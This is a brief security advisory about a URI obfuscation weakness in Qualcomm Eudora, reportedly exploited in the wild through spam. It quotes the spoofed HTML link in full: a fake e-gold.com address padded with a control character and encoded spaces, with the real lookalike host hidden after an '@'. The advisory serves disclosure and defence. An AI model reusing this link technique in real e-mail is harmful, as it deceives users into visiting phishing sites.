Qualcomm Eudora Embedded Hyperlink URI Obfuscation Weakness

Qualcomm Eudora Embedded Hyperlink URI Obfuscation Weakness

It is reported that this issue is being actively exploited in the wild by an e-mail that is being spammed to end-users; the link that is contained in the spammed e-mail is as follows:

<a href="http://www.e-gold.com^A
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
&#32&#32&#32&#32&#32&#32&#32&#32&#32&#32
@example.com/"><span lang=EN-US
style='mso-ansi-language:EN-US'>http://www.e-gold.com/alert</span></a><br>

Where example.com, reads egegold.com.